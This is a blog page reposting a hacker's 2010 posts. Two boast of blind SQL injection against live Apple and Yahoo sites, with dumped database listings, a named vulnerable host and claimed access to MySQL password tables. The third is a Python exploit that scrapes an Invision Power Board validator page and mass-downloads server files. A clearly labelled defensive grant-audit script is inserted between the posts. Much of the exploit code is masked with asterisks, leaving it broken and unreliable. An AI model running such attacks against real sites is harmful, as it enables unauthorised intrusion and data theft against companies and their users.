Sunday, February 5, 2012

TinKode-APPLE Vulnerable to Blind SQLi


APPLE Vulnerable to Blind SQLi

Posted by isrtinkode on February 18, 2010
          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
  #BlindSQLi by TinKode
@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.
Yeah, so it’s a huge company, but it has low security. Sad.
This parameter can be found by anyone in only 5 min with Google.
Testing:


Now let’s see the version
#Version: 5
#Databases: locator_asia, test
#Tables from “locator_asia” database
[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log
#Tables from “test” database
[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp
#Columns from “reseller_city_utf8” table
[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4
A good thing is that there is nothing important to extract…
Great, good bye, TinKode

TinKode-Yahoo Blind SQL Injection


Yahoo Blind SQL Injection

Posted by isrtinkode on February 18, 2010
__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania
Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.
Vulnerable website: http://hk.adspecs.yahoo.com
Testing…


In this picture we can see that SELECT works
Now we try to find the version:
#Version: 5.0.11.24
Ok, it’s normal so far, but we have access to mysql.user (bad)
And some tables from mysql.user (default)
MySQL Database, Table: user
#user
#password
~TinKode
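
Injected SQL runs with the privileges of the web application's database account, so whether an injection can read the mysql system schema is decided by that account's grants. As an added example (not part of the original post), this Python script audits SHOW GRANTS output for grants whose scope covers the mysql schema, including global and wildcard schema grants; the account names and grant lines are constructed sample data.

```python
import re

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?:TABLE |FUNCTION |PROCEDURE )?"
    r"(?P<schema>`[^`]*`|\*)\.(?:`[^`]*`|\*) "
    r"TO '(?P<user>[^']*)'@'(?P<host>[^']*)'")

def schema_pattern(pattern):
    """Compile a schema-level grant pattern (% and _ wildcards, backslash escapes)."""
    parts, i = [], 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 1 < len(pattern):
            i += 1
            parts.append(re.escape(pattern[i]))
        elif ch in "%_":
            parts.append(".*" if ch == "%" else ".")
        else:
            parts.append(re.escape(ch))
        i += 1
    return re.compile("".join(parts))

def audit_grants(lines):
    """Return (account, privileges, reason) for grants whose scope covers the mysql schema."""
    findings = []
    for line in lines:
        m = GRANT_RE.match(line.strip())
        if not m or m["privs"].strip().upper() == "USAGE":
            continue  # not a grant line, or USAGE ("no privileges")
        schema = m["schema"].strip("`")
        if schema == "*":
            reason = "global (*.*) grant: object privileges cover every schema, including mysql"
        elif schema_pattern(schema).fullmatch("mysql"):
            reason = "schema pattern matches the mysql system schema"
        else:
            continue
        findings.append((m["user"] + "@" + m["host"], m["privs"].strip(), reason))
    return findings

# Constructed sample input (hypothetical accounts), in SHOW GRANTS output format.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'app_web'@'localhost'",
    "GRANT SELECT ON `appdb`.* TO 'app_web'@'localhost'",
    "GRANT SELECT, INSERT ON *.* TO 'legacy_web'@'%'",
    "GRANT SELECT ON `mysql`.`user` TO 'report'@'10.0.0.%'",
    "GRANT ALL PRIVILEGES ON `my%`.* TO 'dev'@'localhost'",
]
if __name__ == "__main__":
    print(*audit_grants(SAMPLE_GRANTS), sep="\n")
```

A web-facing account should come back with no findings: its grants should name only the application schema, as the second sample line does.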

TinKode-IPB Full Disclosure Exploit [Python]


IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                      _____ _____  ____    (TM)                | 
\t |                     |_   _|  __ \|  _ \                       | 
\t |                       | | | |__) | |_) |                      | 
\t |                       | | |  ___/|  _ <                       | 
\t |                      _| |_| |    | |_) |                      | 
\t |                     |_____|_|    |____/                       | 
\t |                                                               | 
\t |                                                               | 
\t |                  IPB Full Disclosure expl0it                  | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |                                                               | 
\t |         Visit: www.insecurity.ro & www.darkc0de.com           | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  ipbfd.py scan http://www.site.com/IPB_folder           | 
         |        ipbfd.py download *.zip -> all                         | 
         |        ipbfd.py download name.jpg -> one                      | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(********) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "********": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********]) 
        except Exception as message: 
            print("An error occurred: ********)) 
        except: 
            print("Unknown error.") 
        else: 
            print(********") 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]Extracting content...") 
    hurl = url + "/validator.php" 
    with ********.********) as usock: 
        source = usock.read().decode() 
    print("[+]Finding token...") 
    word = "validate('" 
    index = source.find(word) 
    if index != -1: 
        source = source[********):] 
        value = source[:source.index(********)] 
        hurl = url ********.format(********) 
    else: 
        print("[!]Token not found.") 
    print("[+]********...") 
    with urllib.request.******** as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = line.decode() 
            index = line.find(********) 
            if index != -1: 
                lastk = line[index + ********" ").strip(********) 
            index = line.find(********") 
            if index != -1: 
                lastv = line[index + ********:line.index("********")].********(" ") 
            if lastk != None and lastv != None: 
                index = ********") 
                if index in (********, 0): 
                    lastk = "[other] {}".format(lastk) 
                else: 
                    lastk = "[********}".format(********) 
                dictionary[********astv 
                ******** = None, None 
    print("[+]Organizing and saving paths...") 
    with open("********", "********") as fout: 
        fout.write(********) 
        keys = sorted(********) 
        for key in keys: 
            fout.write(********)) 
 
 
def download_data(files): 
    print("[+]Searching ********...") 
    mthreads = ******** 
    with open(********) as fin: 
        url = fin.readline()********) 
        if files.find("*") == -1: 
            hurl = ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = l********) 
                if pieces[0].count(ext) == 1: 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active********reads: 
                        pass 
                    Download(********) 
    while threading.active_count(******** 
        pass 
 
 
class Download(********): 
 
    def __********): 
        threading.Thread.********) 
        ******** = url 
 
    def run(self): 
        try: 
            with urllib.request.urlopen(********usock: 
                data = ********) 
                uparser = urllib.parse.urlparse(********) 
                pieces = uparser.********) 
                ******** = pieces[********] 
                with open(********) as fout: 
                    fout.********) 
        except: 
            pass 
 
 
********__main__": 
    main()


You must have Python 3.1 for this to work!